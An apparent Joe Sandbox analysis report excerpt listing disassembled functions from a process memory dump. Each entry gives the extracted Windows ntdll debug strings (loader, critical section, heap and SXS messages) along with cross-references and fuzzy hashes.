                                                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017E8D8C
                                                                                                              • Go determine why that thread has not released the critical section., xrefs: 017E8E75
                                                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E8E86
                                                                                                              • This failed because of error %Ix., xrefs: 017E8EF6
                                                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 017E8E02
                                                                                                              • The resource is owned shared by %d threads, xrefs: 017E8E2E
                                                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017E8FEF
                                                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017E8E4B
                                                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017E8DD3
                                                                                                              • The instruction at %p tried to %s , xrefs: 017E8F66
                                                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017E8F26
                                                                                                              • <unknown>, xrefs: 017E8D2E, 017E8D81, 017E8E00, 017E8E49, 017E8EC7, 017E8F3E
                                                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017E8DA3
                                                                                                              • a NULL pointer, xrefs: 017E8F90
                                                                                                              • The resource is owned exclusively by thread %p, xrefs: 017E8E24
                                                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 017E8F3F
                                                                                                              • *** Inpage error in %ws:%s, xrefs: 017E8EC8
                                                                                                              • write to, xrefs: 017E8F56
                                                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017E8F34
                                                                                                              • *** enter .exr %p for the exception record, xrefs: 017E8FA1
                                                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E8E3F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                              • API String ID: 0-108210295
                                                                                                              • Opcode ID: 9355dc3802e31146648e07356110ec30343a1034024a3db65d8c03f7afed947f
                                                                                                              • Instruction ID: 7f5984544679d274d81f344a2a66690e4f24844c2f12d06d0c53d43fd37f13eb
                                                                                                              • Opcode Fuzzy Hash: 9355dc3802e31146648e07356110ec30343a1034024a3db65d8c03f7afed947f
                                                                                                              • Instruction Fuzzy Hash: FB8105B5A44220BFDB259A1DCC9DEABFFB5EF5EB10F044098F2086F152E3758442C662
                                                                                                              Function 017B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
                                                                                                              • Instruction ID: 99df3b53211d3110d2a0f49f17bfdf4674f7031a13b9f40ef0d4e118e72fe0a1
                                                                                                              • Opcode Fuzzy Hash: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
                                                                                                              • Instruction Fuzzy Hash: 37928F71609742AFE721DF28C884BABF7E8BB88754F04492DFA94D7252D770E844CB52
                                                                                                              Function 01768620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 017A5543
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A540A, 017A5496, 017A5519
                                                                                                              • Critical section address, xrefs: 017A5425, 017A54BC, 017A5534
                                                                                                              • Thread identifier, xrefs: 017A553A
                                                                                                              • Address of the debug info found in the active list., xrefs: 017A54AE, 017A54FA
                                                                                                              • double initialized or corrupted critical section, xrefs: 017A5508
                                                                                                              • Critical section address., xrefs: 017A5502
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54CE
                                                                                                              • Invalid debug info address of this critical section, xrefs: 017A54B6
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54E2
                                                                                                              • Critical section debug info address, xrefs: 017A541F, 017A552E
                                                                                                              • corrupted critical section, xrefs: 017A54C2
                                                                                                              • 8, xrefs: 017A52E3
                                                                                                              • undeleted critical section in freed memory, xrefs: 017A542B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              • Opcode ID: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
                                                                                                              • Instruction ID: f32b1a927204cf677fd89d60692bda691fb6cd9bf609df1d862a57d6ade333b3
                                                                                                              • Opcode Fuzzy Hash: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
                                                                                                              • Instruction Fuzzy Hash: 9681BDB0A40358EFDB20CF99C895BAEFBB9FB48B04F644259F904B7241D375A941CB61
                                                                                                              Function 017629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A2624
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A261F
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A22E4
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2409
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A2498
                                                                                                              • @, xrefs: 017A259B
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A24C0
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A2412
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A2602
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2506
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A25EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              • Opcode ID: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
                                                                                                              • Instruction ID: 2ad09adaf471c9177c6007789209febafa29952d00ab99ef055ce9a0a7b660b3
                                                                                                              • Opcode Fuzzy Hash: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
                                                                                                              • Instruction Fuzzy Hash: 580260F1D042299FDB61DB58CC84BD9F7B8AF54704F4041EAEA09A7246EB309E84CF59
                                                                                                              Function 017D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              • Opcode ID: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
                                                                                                              • Instruction ID: 0d18d2d492c18af44e0c4f2dfe6155ea2fdfaae2242e02b77eb54663a6e16dce
                                                                                                              • Opcode Fuzzy Hash: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
                                                                                                              • Instruction Fuzzy Hash: F751B1B15043499BD72ACF188848BABFBFCEF98240F14496DE999C3285E770D644C7A3
                                                                                                              Function 0174AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                              • API String ID: 0-3197712848
                                                                                                              • Opcode ID: e14eff7677dc041c18a7f85ac7d9c8696bd362626acacafe3d06c8a6a88109e8
                                                                                                              • Instruction ID: 7486973eca5383307cb25e876725f0efecd953c6e39ee1611ad7877c366d6d1e
                                                                                                              • Opcode Fuzzy Hash: e14eff7677dc041c18a7f85ac7d9c8696bd362626acacafe3d06c8a6a88109e8
                                                                                                              • Instruction Fuzzy Hash: 5C121171A483468FD735DF28C880BAAF7E4BF95704F04495DF9868B291E734DA44CB92
                                                                                                              Function 017E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
                                                                                                              • Instruction ID: e39d6498ded979dd95c65608d5cb0a959879735f34ad87a27d4144fb6c2c5f82
                                                                                                              • Opcode Fuzzy Hash: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
                                                                                                              • Instruction Fuzzy Hash: 58D1CD71604686DFDB22DFA8C458AADFBF1FF5A710F188059F8859B252C7B49942CF20
                                                                                                              Function 017B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • VerifierFlags, xrefs: 017B8C50
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B8A67
                                                                                                              • HandleTraces, xrefs: 017B8C8F
                                                                                                              • VerifierDlls, xrefs: 017B8CBD
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B8A3D
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 017B8B8F
                                                                                                              • VerifierDebug, xrefs: 017B8CA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              • Opcode ID: fb78b65cf1f9506f30299967dd693979767afd334342d2d014224e03d77dacff
                                                                                                              • Instruction ID: 10a4b55e2e1db1d08582ee9805034e28485ca7f8c4b41ae67e9f1755c32801e1
                                                                                                              • Opcode Fuzzy Hash: fb78b65cf1f9506f30299967dd693979767afd334342d2d014224e03d77dacff
                                                                                                              • Instruction Fuzzy Hash: 7C9126B1645312AFD722DF28C8D4BEBF7A8EB54B14F444499FA45AB284C7309E40CB96
                                                                                                              Function 0173EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: 6251b022b6a5ef1230b5218b14bc631b694034768bfad798ea75617ab67025b8
                                                                                                              • Instruction ID: c28359c9402565865237fac986fdf45fbec7839d589fe951db54978e4bbabe93
                                                                                                              • Opcode Fuzzy Hash: 6251b022b6a5ef1230b5218b14bc631b694034768bfad798ea75617ab67025b8
                                                                                                              • Instruction Fuzzy Hash: 86A23970E0562A8BDF64CF18D988BADFBB5AF85344F1442E9D90EA7251DB309E85CF00
                                                                                                              Function 0173ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                              • API String ID: 0-4098886588
                                                                                                              • Opcode ID: 63d45a441231f73029532d03e3dea69ef5b6276c2fd5defac407c22b7f4f75d0
                                                                                                              • Instruction ID: 88647e2dab9c61e4502d418d4572aecaeef9c78feac8615ad822b498da0a4b5e
                                                                                                              • Opcode Fuzzy Hash: 63d45a441231f73029532d03e3dea69ef5b6276c2fd5defac407c22b7f4f75d0
                                                                                                              • Instruction Fuzzy Hash: BC3282719442698BDF22CF28C898BEEFBB5BF85340F1441E9E849A7252D7719E858F40
                                                                                                              Function 017663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
                                                                                                              • Instruction ID: 8910bd41c6e0460e0325ea7e6f139ab24d685e7df5e0910dd1847fc6e4ddad1e
                                                                                                              • Opcode Fuzzy Hash: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
                                                                                                              • Instruction Fuzzy Hash: A6916970B003159BDB36DF18D858BAAFBA5FB80B14F944228FE02672C5D7B59A01CB90
                                                                                                              Function 0172645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • apphelp.dll, xrefs: 01726496
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01789A11, 01789A3A
                                                                                                              • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017899ED
                                                                                                              • Getting the shim user exports failed with status 0x%08lx, xrefs: 01789A01
                                                                                                              • LdrpInitShimEngine, xrefs: 017899F4, 01789A07, 01789A30
                                                                                                              • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01789A2A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
                                                                                                              • Instruction ID: aaded4cd8ebf95b62906e12fcb1336a6a7226f7f3a9f360181f9126fa65daa63
                                                                                                              • Opcode Fuzzy Hash: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
                                                                                                              • Instruction Fuzzy Hash: 8F51C1712583049FD721EF28C895BABF7E4FB84648F10492EFA8597155E730EA05CB93
                                                                                                              Function 01762674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A2178
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A219F
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 017A2165
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A21BF
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 017A2160, 017A219A, 017A21BA
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A2180
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                                                                                                              • Instruction ID: b56229ad1adb29513a23d60a7e253524e0c70a4a10fbc675dd691000ea439c95
                                                                                                              • Opcode Fuzzy Hash: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                                                                                                              • Instruction Fuzzy Hash: 21313576B80215B7E7258A9DCC85F9AFA6CDBA4A40F054169FF04B7146D270AE00C7A1
                                                                                                              Function 0176C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpInitializeProcess, xrefs: 0176C6C4
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 017A8170
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0176C6C3
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 017A8181, 017A81F5
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A81E5
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 017A8177, 017A81EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
                                                                                                              • Instruction ID: 9e3f194c11cada4fe2155a87bba23375d60763d850e249dc390ee8db20600dc1
                                                                                                              • Opcode Fuzzy Hash: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
                                                                                                              • Instruction Fuzzy Hash: C23106B16443429FD325EF28D859E2AF7E4AF94B10F00055CFD815B299D660ED04CBA2
                                                                                                              Function 0177096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 01772DF0: LdrInitializeThunk.NTDLL ref: 01772DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                                                                                                              • Instruction ID: 294aec694b496bb388cb65d9927a39ad470499d1fe9ee1a2d8527e6ab75bad3b
                                                                                                              • Opcode Fuzzy Hash: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                                                                                                              • Instruction Fuzzy Hash: A6427C71900715DFDB21CF28C884BAAB7F4FF49304F1445AAEA89DB245E770AA84CF61
                                                                                                              Function 0173A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                                                                                                              • Instruction ID: 204b753e69195aad9da9ea3a1843ca08d0e71c61dc3572be8246aa6abc2507a0
                                                                                                              • Opcode Fuzzy Hash: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                                                                                                              • Instruction Fuzzy Hash: 8CC15674108382DFDB11DF58C045B6AFBE4AF95704F0489AAF9D6CB292E734CA49CB52
                                                                                                              Function 01768402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpInitializeProcess, xrefs: 01768422
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01768421
                                                                                                              • @, xrefs: 01768591
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176855E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
